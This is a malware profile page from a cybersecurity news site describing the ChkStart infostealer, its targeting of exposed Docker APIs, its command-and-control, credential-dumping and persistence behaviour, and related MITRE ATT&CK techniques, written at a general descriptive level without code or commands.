Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Malware

ChkStart (Infostealer) – Malware

June 13, 2024
Reading Time: 4 mins read
in Malware
ChkStart (Infostealer) – Malware

ChkStart

Type of Malware

Infostealer

Country of Origin

Unknown

Date of initial activity

2024

Targeted Countries

Unknown

Motivation

Data Theft
Financial Gain

Attack Vectors

Credential Based Attacks
Software Vulnerabilities

Targeted Systems

Linux

Type of information Stolen

System Information
Login Credentials
Financial Information

Overview

CHKSTART malware has recently emerged as a notable threat in the cybersecurity domain, drawing attention from experts due to its sophisticated capabilities and its impact on targeted systems. This malware is engineered to exploit vulnerabilities and weaknesses in various environments, making it a versatile and dangerous adversary. With a focus on both stealth and functionality, CHKSTART presents a multifaceted challenge to security professionals and organizations alike. At its core, CHKSTART operates with a highly modular architecture, allowing it to adapt and evolve based on the specific needs of the attackers. This modularity enables the malware to perform a wide range of malicious activities, from basic reconnaissance to advanced data exfiltration. CHKSTART’s design reflects a strategic approach to cyberattacks, where each component is crafted to maximize impact while minimizing detection risks. One of the key features of CHKSTART is its capability to bypass traditional security measures through sophisticated evasion techniques. The malware often employs various methods to avoid detection by security software, including code obfuscation, encryption, and the use of legitimate system processes to mask its presence. These tactics are designed to remain under the radar, making it challenging for standard defenses to identify and neutralize the threat.

Targets

Docker Engine Hosts: The malware specifically looks for Docker hosts that have port 2375 open and are exposed to the internet without proper authentication. This is often a result of misconfigured Docker instances. Publicly Exposed Systems: The attackers focus on systems that are publicly accessible, allowing them to exploit Docker APIs to gain unauthorized access. Systems with Misconfigured Docker Environments: Targets are often Docker environments where the root directory of the host machine is bound into Docker containers, providing attackers with direct access to the host’s filesystem. Systems Vulnerable to Cryptojacking: Once inside, the malware is designed to set up a persistent cryptojacking operation. It aims to install cryptojacking payloads that utilize the system’s resources to mine cryptocurrencies for the attackers. Systems with Certain Service Configurations: The malware also targets systems with specific systemd service configurations, using these services as a vector to persistently execute its payloads.

How they operate

At its core, CHKSTART functions by establishing a command and control (C2) channel with its operators. Once the malware is executed on a victim’s machine, it typically initiates a connection to a remote server controlled by the attacker. This connection is used to receive further instructions and transmit stolen data. CHKSTART’s ability to communicate with the C2 server allows it to perform various actions based on the commands received, ranging from data collection to system manipulation. One of the key technical features of CHKSTART is its use of screen capture techniques. This functionality enables the malware to take screenshots of the victim’s desktop, potentially capturing sensitive information displayed on the screen. These screenshots are then transmitted back to the attacker through the established C2 channel. This tactic is particularly concerning as it can reveal confidential data, including personal information and financial details. CHKSTART also employs credential dumping techniques to gain unauthorized access to stored credentials on the infected system. By targeting and extracting credentials from various storage locations, the malware enhances its ability to compromise additional accounts and systems. This process typically involves accessing system databases or memory where credentials are stored in plaintext or easily retrievable formats. Persistence is another critical aspect of CHKSTART’s operation. To ensure that it remains active even after system reboots or user logins, the malware may utilize scheduled tasks or jobs. These tasks are set to trigger the malware at specified intervals or system events, ensuring that it continues to operate and exfiltrate data even if initial infection vectors are mitigated. In terms of defense evasion, CHKSTART incorporates various techniques to avoid detection and removal. This includes removing or obfuscating logs and system indicators that could reveal its presence. By hiding its activities and modifying system settings, CHKSTART reduces the likelihood of detection by security tools and system administrators.

MITRE Tactics and Techniques

Collection (T1113 – Screen Capture): CHKSTART may utilize screen capture techniques to gather information from the victim’s screen, capturing sensitive data displayed on the system. Credential Access (T1003 – Credential Dumping): The malware can target and extract stored credentials from the system, potentially using various credential dumping techniques to access sensitive information. Exfiltration (T1041 – Exfiltration Over Command and Control Channel): CHKSTART typically exfiltrates stolen data over its command and control (C2) channel. This tactic involves sending the captured information to the attacker’s server. Persistence (T1053 – Scheduled Task/Job): CHKSTART might use scheduled tasks or jobs to maintain persistence on the infected system, ensuring it remains active and operational even after reboots. Defense Evasion (T1070 – Indicator Removal on Host): To avoid detection and removal, CHKSTART may employ methods to hide its presence or remove traces of its activity from the system.
References
  • New Malware Targets Exposed Docker APIs for Cryptocurrency Mining
  • Attackers deploying new tactics in campaign targeting exposed Docker APIs
Tags: encryptioninfostealerMalwareobfuscationVulnerabilities
ADVERTISEMENT

Related Posts

Iranian Phishing Campaign (Scam) – Malware

Iranian Phishing Campaign (Scam) – Malware

March 2, 2025
Fake WalletConnect (Infostealer) – Malware

Fake WalletConnect (Infostealer) – Malware

March 2, 2025
SilentSelfie (Infostealer) – Malware

SilentSelfie (Infostealer) – Malware

March 2, 2025
Sniper Dz (Scam) – Malware

Sniper Dz (Scam) – Malware

March 2, 2025
TikTok Malware Scam (Trojan) – Malware

TikTok Malware Scam (Trojan) – Malware

March 2, 2025
Zombinder (Exploit Kit) – Malware

Zombinder (Exploit Kit) – Malware

March 2, 2025

Latest Alerts

Mozilla Urgent Firefox Patch Fixes RCE Flaws

ModiLoader Malware Targets Windows Users

Glibc Flaw Gives Linux Root Access Risk

Fileless Remcos RAT Delivery Via LNK Files

FBI Warns of AI Voice Phishing Scams

APT28 RoundPress Webmail Hack Steals Emails

Subscribe to our newsletter

    Latest Incidents

    Massive DDoS Hits Poland’s Civic Platform

    Arla Plant Cyberattack Halts Operations

    Georgia’s Harbin Clinic Hit by Data Breach

    Hackers Target Swiss Reserve Power Plant

    Coinbase Insider Attack Exposed User Data

    Cyberattack Hits J Batista Group

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial